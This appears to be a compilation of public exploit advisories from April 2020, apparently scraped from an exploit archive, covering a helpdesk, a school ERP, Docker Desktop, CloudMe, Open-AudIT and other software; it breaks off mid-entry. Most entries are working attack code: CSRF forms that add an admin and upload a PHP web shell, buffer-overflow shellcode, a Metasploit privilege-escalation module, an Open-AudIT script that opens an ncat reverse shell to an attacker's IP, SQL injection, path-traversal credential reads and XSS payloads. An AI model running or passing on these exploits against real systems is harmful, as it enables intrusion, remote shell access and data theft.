ISHACK AI BOT

# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin) # Date: 2020-04-26 # Author: Besim ALTINOK # Vendor Homepage: https://www.maiansupport.com # Software Link: https://www.maiansupport.com/zip.html # Version: v4.3 # Tested on: Xampp # Credit: İsmail BOZKURT ---------------------------------------------- Here is the Detail: -------------------------------------------------- This product is unprotected against CSRF vulnerabilities. With this attack, you can add an admin account to the system. In addition, you can add files from the F.A.Q field as admin.There are no file restrictions here. Therefore, you can upload a PHP file here with CSRF. If you want, you can add an admin account first and then access the system and upload files. Or you can upload files with direct admin rights. --------------------------------------------------- CSRF PoC - 1 (Add Administrator user) ------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/helpdesk/admin/index.php?ajax=team" method="POST"> <input type="hidden" name="enabled" value="yes" /> <input type="hidden" name="admin" value="yes" /> <input type="hidden" name="welcome" value="yes" /> <input type="hidden" name="name" value="Besim&#32;ALTINOK" /> <input type="hidden" name="email" value="test2&#64;gmail&#46;com" /> <input type="hidden" name="accpass" value="111111" /> <input type="hidden" name="timezone" value="0" /> <input type="hidden" name="language" value="" /> <input type="hidden" name="addpages" value="" /> <input type="hidden" name="notePadEnable" value="yes" /> <input type="hidden" name="enableLog" value="yes" /> <input type="hidden" name="mergeperms" value="yes" /> <input type="hidden" name="profile" value="yes" /> <input type="hidden" name="ticketHistory" value="yes" /> <input type="hidden" name="close" value="yes" /> <input type="hidden" name="lock" value="yes" /> <input type="hidden" name="editperms&#91;&#93;" value="ticket" /> <input type="hidden" name="editperms&#91;&#93;" value="reply" /> <input type="hidden" name="timer" value="yes" /> <input type="hidden" name="startwork" value="yes" /> <input type="hidden" name="workedit" value="yes" /> <input type="hidden" name="notify" value="yes" /> <input type="hidden" name="spamnotify" value="yes" /> <input type="hidden" name="signature" value="" /> <input type="hidden" name="nameFrom" value="" /> <input type="hidden" name="emailFrom" value="" /> <input type="hidden" name="email2" value="" /> <input type="hidden" name="notes" value="" /> <input type="hidden" name="mailbox" value="yes" /> <input type="hidden" name="mailDeletion" value="yes" /> <input type="hidden" name="mailScreen" value="yes" /> <input type="hidden" name="mailCopy" value="yes" /> <input type="hidden" name="mailFolders" value="5" /> <input type="hidden" name="mailPurge" value="0" /> <input type="hidden" name="digest" value="yes" /> <input type="hidden" name="process" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> - After the Add admin account, you can upload the PHP file. CSRF PoC 2 - ( Directly, File Upload) ---------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/localhost\/helpdesk\/admin\/index.php?ajax=faqattach", true); xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01"); xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------1851832753272583700731626849"); xhr.withCredentials = true; var body = "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\n" + "Content-Type: text/php\r\n" + "\r\n" + "\x3c?php echo system($_GET[\'cmd\']); ?\x3e\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"file[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"remote[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"remote[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"remote[]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"process\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------1851832753272583700731626849\r\n" + "Content-Disposition: form-data; name=\"opath\"\r\n" + "\r\n" + "\r\n" + "-----------------------------1851832753272583700731626849--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> HTTP Request: ----------------------------------------------------------------------------------------- GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec; bp_ut_session={"pageviews":1,"referrer":" http://localhost/olms/library/assets/js/images/","landingPage":" http://localhost/olms/library/assets/js/images/sort_asc.html ","started":1587817504988}; HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6 Upgrade-Insecure-Requests: 1 HTTP Response: ------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 26 Apr 2020 12:15:31 GMT Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/7.2.29 Content-Length: 39 Connection: close Content-Type: text/html; charset=UTF-8 shell.php shell_test.php shell_test.php

# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution # Date: 2020-04-27 # Exploit Author: 0xEmma/BugByte/SebastianPC # Vendor Homepage: https://www.valvesoftware.com/en/ # Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302 # Tested on: MacOS 15.3 # CVE : CVE-2020-12242 import os, random, sys banner = """ :'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########: '##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..:: ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##:::: . ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##:::: :..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##:::: '##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##:::: . ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##:::: :......::::.......::::.......::::......::::.......:::..::::..:::......:::::..::::: """ print(banner) if os.name == "posix": command = str(input("Code to run? ")) payload = '"; ' + command + '; echo "' f = open("/tmp/hl2_relaunch", "w") f.write(payload) f.close() if os.name == "nt": print("Windows based OS's not supported, see CVE-2020-12242")

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Post::Windows::Priv include Post::Windows::Runas def initialize(info = {}) super( update_info( info, 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation', 'Description' => %q{ This exploit leverages a vulnerability in docker desktop community editions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login. }, 'License' => MSF_LICENSE, 'Author' => [ 'Morgan Roman', # discovery 'bwatters-r7', # metasploit module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [[ 'Automatic', {} ]], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 15 }, 'DisclosureDate' => '2019-07-05', 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ] }, 'References' => [ ['CVE', '2019-15752'], ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e'] ] ) ) register_options( [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])] ) end def docker_version output = cmd_exec('cmd.exe', '/c docker -v') vprint_status(output) version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0] Gem::Version.new(version_string.split('.').map(&:to_i).join('.')) end def check if docker_version <= Gem::Version.new('18.09.0') return CheckCode::Appears end CheckCode::Safe end def exploit check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end # make payload docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin") fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path) payload_name = 'docker-credential-wincred.exe' payload_pathname = "#{docker_path}\\#{payload_name}" vprint_status('Making Payload') payload = generate_payload_exe # upload Payload vprint_status("Uploading Payload to #{payload_pathname}") write_file(payload_pathname, payload) vprint_status('Payload Upload Complete') print_status('Waiting for user to attempt to login') end def check_permissions! unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin # is_in_admin_group can be nil, true, or false end end

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) # Date: 2020-04-27 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 10 x86 #Instructions: # Start the CloudMe service and run the script. import socket target = "127.0.0.1" padding1 = b"\x90" * 1052 EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET NOPS = b"\x90" * 30 #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33" payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc" payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f" payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8" payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f" payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43" payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee" payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4" payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a" payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff" payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33" payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59" payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05" payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4" payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6" payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c" payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f" overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload)) buf = padding1 + EIP + NOPS + payload + overrun try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,8888)) s.send(buf) except Exception as e: print(sys.exc_value)

# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT SQL Injection Detail -------------------------------- *# Vulnerable parameter: es_messagesid* *# Vulnerable code:* if($action=="fullmessage_sent"){ $msg_qry ="SELECT * FROM es_messages WHERE from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and es_messagesid=".*$es_messagesid;* $details_message=$db->getrow($msg_qry); } ?> *Here is the SQLmap output:* *----------------------------------------* GET parameter '*es_messagesid*' is vulnerable. sqlmap identified the following injection point(s): --- Parameter: es_messagesid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT 6369=6369 Type: UNION query Title: Generic UNION query (random number) - 12 columns Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL SELECT 6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194-- - --- [01:09:41] [INFO] testing MySQL [01:09:42] [INFO] confirming MySQL [01:09:44] [INFO] the back-end DBMS is MySQL

# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-04-27 # Vendor Homepage: https://www.nvidia.com/es-la/ # Software Link : https://www.nvidia.com/es-la/ # Tested Version: 1.0.21 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """ NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto C:\>sc qc nvUpdatusService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: nvUpdatusService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START (DELAYED) CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : NVIDIA Update Service Daemon DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: .\UpdatusUser C:\> #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution # Date: 2020-04-22 # Exploit Author: Askar # CVE: CVE-2020-8813 # Vendor Homepage: https://opmantek.com/ # Version: v3.3.1 # Tested on: Ubuntu 18.04 / PHP 7.2.24 #!/usr/bin/python3 import requests import sys import warnings import random import string from bs4 import BeautifulSoup from urllib.parse import quote warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) != 6: print("[~] Usage : ./openaudit-exploit.py url username password ip port") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() def inject_payload(): configuration_path = url+"/en/omk/open-audit/configuration/90" data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port) request.patch(configuration_path, data) print("[+] Payload injected in settings") def start_discovery(): discovery_path = url+"/en/omk/open-audit/discoveries/create" post_discovery_path = url+"/en/omk/open-audit/discoveries" scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)]) req = request.get(discovery_path) response = req.text soup = BeautifulSoup(response, "html5lib") token = soup.findAll('input')[5].get("value") buttons = soup.findAll("button") headers = {"Referer" : discovery_path} request_data = { "data[attributes][name]":scan_name, "data[attributes][other][subnet]":"10.10.10.1/24", "data[attributes][other][ad_server]":"", "data[attributes][other][ad_domain]":"", "submit":"", "data[type]":"discoveries", "data[access_token]":token, "data[attributes][complete]":"y", "data[attributes][org_id]":"1", "data[attributes][type]":"subnet", "data[attributes][devices_assigned_to_org]":"", "data[attributes][devices_assigned_to_location]":"", "data[attributes][other][nmap][discovery_scan_option_id]":"1", "data[attributes][other][nmap][ping]":"y", "data[attributes][other][nmap][service_version]":"n", "data[attributes][other][nmap][open|filtered]":"n", "data[attributes][other][nmap][filtered]":"n", "data[attributes][other][nmap][timing]":"4", "data[attributes][other][nmap][nmap_tcp_ports]":"0", "data[attributes][other][nmap][nmap_udp_ports]":"0", "data[attributes][other][nmap][tcp_ports]":"22,135,62078", "data[attributes][other][nmap][udp_ports]":"161", "data[attributes][other][nmap][timeout]":"", "data[attributes][other][nmap][exclude_tcp_ports]":"", "data[attributes][other][nmap][exclude_udp_ports]":"", "data[attributes][other][nmap][exclude_ip]":"", "data[attributes][other][nmap][ssh_ports]":"22", "data[attributes][other][match][match_dbus]":"", "data[attributes][other][match][match_fqdn]":"", "data[attributes][other][match][match_dns_fqdn]":"", "data[attributes][other][match][match_dns_hostname]":"", "data[attributes][other][match][match_hostname]":"", "data[attributes][other][match][match_hostname_dbus]":"", "data[attributes][other][match][match_hostname_serial]":"", "data[attributes][other][match][match_hostname_uuid]":"", "data[attributes][other][match][match_ip]":"", "data[attributes][other][match][match_ip_no_data]":"", "data[attributes][other][match][match_mac]":"", "data[attributes][other][match][match_mac_vmware]":"", "data[attributes][other][match][match_serial]":"", "data[attributes][other][match][match_serial_type]":"", "data[attributes][other][match][match_sysname]":"", "data[attributes][other][match][match_sysname_serial]":"", "data[attributes][other][match][match_uuid]":"" } print("[+] Creating discovery ..") req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False) disocvery_url = url + req.headers['Location'] + "/execute" print("[+] Triggering payload ..") print("[+] Check your nc ;)") request.get(disocvery_url) def login(): login_info = { "redirect_url": "/en/omk/open-audit", "username": username, "password": password } login_request = request.post(url+"/en/omk/open-audit/login", login_info) login_text = login_request.text if "There was an error authenticating" in login_text: return False else: return True if login(): print("[+] LoggedIn Successfully") inject_payload() start_discovery() else: print("[-] Cannot login!")

# Exploit Title: School ERP Pro 1.0 - Remote Code Execution # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT Description ------------------------------------------- A student can send a message to the admin. Additionally, with this method, the student can upload a PHP file to the system and run code in the system. ------------------------------------ *Vulnerable code - 1: (for student area) - sendmail.inc.php* - Student user can send message to admin with the attachment ------------------------------------ $image_file = basename($_FILES['newimage']['name'][$i]); $ext=explode(".",$_FILES['newimage']['name'][$i]); $str=date("mdY_hms"); //$t=rand(1, 15); $new_thumbname = "$ext[0]".$str.$t.".".$ext[1]; $updir = "images/messagedoc/"; $dest_path = $updir.$new_thumbname; $up_images[$i] = $dest_path; $srcfile = $_FILES['newimage']['tmp_name'][$i]; @move_uploaded_file($srcfile, $dest_path); $ins_arr_prod_images = array( '`es_messagesid`' => $id, '`message_doc`' => $new_thumbname ); $idss=$db->insert("es_message_documents",$ins_arr_prod_images); --------------------------------------------------- *PoC of the Remote Code Execution* --------------------------------------------------- POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 *************************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin Content-Type: multipart/form-data; boundary=---------------------------2104557667975595321153031663 Content-Length: 718 DNT: 1 Connection: close Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c Upgrade-Insecure-Requests: 1 -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="subject" DEDED -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="message" <p>DEDED</p> -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="newimage[]"; filename="shell.php" Content-Type: text/php <?php phpinfo(); ?> -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="filecount[]" 1 -----------------------------2104557667975595321153031663 Content-Disposition: form-data; name="submit_staff" Send -----------------------------2104557667975595321153031663-- ------------------------------------ *Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php* - Admin user can update user profile photo ------------------------------------ if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) { $ext = explode(".",$_FILES['pre_image']['name']); $str = date("mdY_hms"); $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; $updir = "images/student_photos/"; $uppath = $updir.$new_thumbname; move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath); $file = $new_thumbname; ------------------------------------ Bypass Technique: ------------------------------------ $_FILES['pre_image']['name']; --- > shell.php.png $ext = explode(".",$_FILES['pre_image']['name']); --- $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; $ext[0] --> shell $ext[1] --> php lastfilename --> st_date_shell.php

# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT # CVE: N/A Vulnerable code: (/student_staff/download.php) - File Name: download.php - Content of the download.php <?php if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") { $file = $_REQUEST['document']; header("Content-type: application/force-download"); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header("Content-disposition: attachment; filename=\"".$file."\""); readfile($file); exit; } ?> ------------ *Payload:* --------------- http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php ------------------------ *After run payload: (we accessed of the file content)* ------------------------ <?php define('DB_SERVER', 'localhost'); define('DB_SERVER_USERNAME', 'aroxi********'); define('DB_SERVER_PASSWORD', 'erp**********'); define('DB_DATABASE', 'aroxi****************'); ?>

# Title: Easy Transfer 1.7 for iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-27 # Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 # CVE: N/A Document Title: =============== Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2223 Common Vulnerability Scoring System: ==================================== 7.1 Affected Product(s): ==================== Rubikon Teknoloji Product: Easy Transfer v1.7 - iOS Mobile Web-Application (Copy of the Homepage: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 ) Vulnerability Disclosure Timeline: ================================== 2020-04-27: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ 1.1 A directory traversal web vulnerability has been discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path. The directory-traversal web vulnerability is located in the main application path request performed via GET method. Attackers are able to request for example the local path variables of the web-server by changing the local path in the performed request itself. In a first request the attack changes the path, the host redirects to complete the adress with "..". Then the attacker just attaches /.. a final slash to its request and the path can be accessed via web-browser to download or list local files. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise. 1.2 Multiple persistent cross site scripting vulnerability has been discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side. The persistent vulnerabilities are located in the `Create Folder` and `Move/Edit` functions. Attackers are able to inject own malicious script codes to the `oldPath`, `newPath` and `path` parameters. The request method to inject is POST and the attack vector is located on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Create Folder [+] Move/Edit Vulnerable Parameter(s): [+] oldPath [+] newPath [+] path Proof of Concept (PoC): ======================= 1.1 The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploitation http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../ [{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}] --- PoC Session Logs [GET] --- (list) http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../ Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive - GET: HTTP/1.1 200 OK Content-Length: 213 Content-Type: application/json Connection: Close 1.2 The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi network access with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploitation <scriptx00>alert(document.domain)</script> --- PoC Session Logs [POST] --- (Create & Move) http://localhost/create Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 47 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ path=/test<scriptx00>alert(document.domain)</script> - POST: HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 2 Content-Type: application/json Connection: Close - http://localhost/move Host: localhost Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 69 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script> - POST: HTTP/1.1 200 OK Content-Length: 411 Content-Type: text/html; charset=utf-8 Connection: Close - [GET] (Execution) http://localhost/evil.source Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: http://localhost/ Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-04-28 # Vendor Homepage: https://andreaelectronics.com/ # Software Link : https://andreaelectronics.com/ # Tested Version: 1.0.64.7 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """ Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto C:\>sc qc AESTFilters [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: AESTFilters TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Andrea ST Filters Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC) # Author: Vulnerability Laboratory # Date: 2020-04-28 # Vendor: https://www.internetdownloadmanager.com # Software: https://www.internetdownloadmanager.com/download.html # CVE: N/A Document Title: =============== Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2236 Common Vulnerability Scoring System: ==================================== 7.1 Vulnerability Disclosure Timeline: ================================== 2020-04-28: Public Disclosure (Vulnerability Laboratory) (Copy of the Homepage: https://www.internetdownloadmanager.com/support/about_us.html ) (Sofwtare Product: https://www.internetdownloadmanager.com/download.html) Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ Multiple stack buffer overflow vulnerabilities has been discovered in the official Internet Download Manager v6.37.11.1 software. The bufer overflow allows to overwrite registers of the process to compromise the file-system by elevates local process privileges. 1.1 The first stack buffer overflow is located in the `search` function of the downloads menu. The search function itself does not use any secure restriction in the requested search variable of the inputs. Local attackers with access to the software are able to overflow the registers to elevate local process privileges. Thus allows a local attacker to compromise the local computer- or file-system. 1.2 The second stack buffer overflow is located in the `Export/Import` function of the tasks menu. Local users are able to import and export the download tasks as 